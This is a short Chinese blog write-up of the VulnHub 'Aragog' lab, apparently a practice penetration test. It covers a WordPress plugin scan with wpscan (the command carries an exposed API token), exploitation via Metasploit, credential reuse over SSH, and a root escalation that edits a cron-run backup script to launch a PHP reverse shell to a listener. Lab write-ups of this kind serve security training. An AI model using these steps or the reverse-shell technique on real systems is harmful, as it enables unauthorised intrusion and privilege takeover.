首页 > 其他分享 >Aragog-1

Aragog-1

时间:2024-07-17 11:44:53浏览次数:12  
标签:-- 192.168 漏洞 Aragog 测试 php

概述

测试目的

【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)_aragog靶场-CSDN博客

测试范围

序号

系统

IP

1

本机

192.168.152.128

2

Aragog靶机

192.168.152.141

详细测试流程

1、发现测试目标

2、信息收集

3、漏洞利用

wpscan --api-token=OGdgn8Ekao1Pt4jgVrO3AsxsWcQ4yC1liIzYC3756Tk --url=http://192.168.152.141/blog -e p --plugins-detection aggressive

在msf上面搜索漏洞

4、提权

连上数据库以后获得账号密码,登录ssh

发现/opt/.backup.sh的可执行文件

修改内容

/usr/bin/php /tmp/php-reverse-shell

php-reverse-shel是卡利里面/usr/sharte/webshell/php里面的修改一下ip和端口就可以用了

监听等待

过了一会就得到了root权限

漏洞详情和修复建议

测试结果综述

标签:--,192.168,漏洞,Aragog,测试,php
From: https://www.cnblogs.com/cll-wlaq/p/18306947

相关文章

  • vulnhub - Aragog - writeup
    信息收集目标开放了80、22端口。root@Locklytemp/tmp»arp-scan-Ieth1-lInterface:eth1,type:EN10MB,MAC:00:0c:29:fa:3d:23,IPv4:192.168.56.106Startingarp-scan1.10.0with256hosts(https://githu......
  • hackthebox --aragog
    主机发现与爆破nmap-sT--min-rate1000010.10.10.78nmap-sT-sV-sC-O-p22,21,8010.10.10.78 发现有ftp匿名登陆└─$ftp10.10.10.78Connectedto10.10.10.78.220(vsFTPd3.0.3)Name(10.10.10.78:kali):anonymous230Loginsuccessful.Remotesystemtypeis......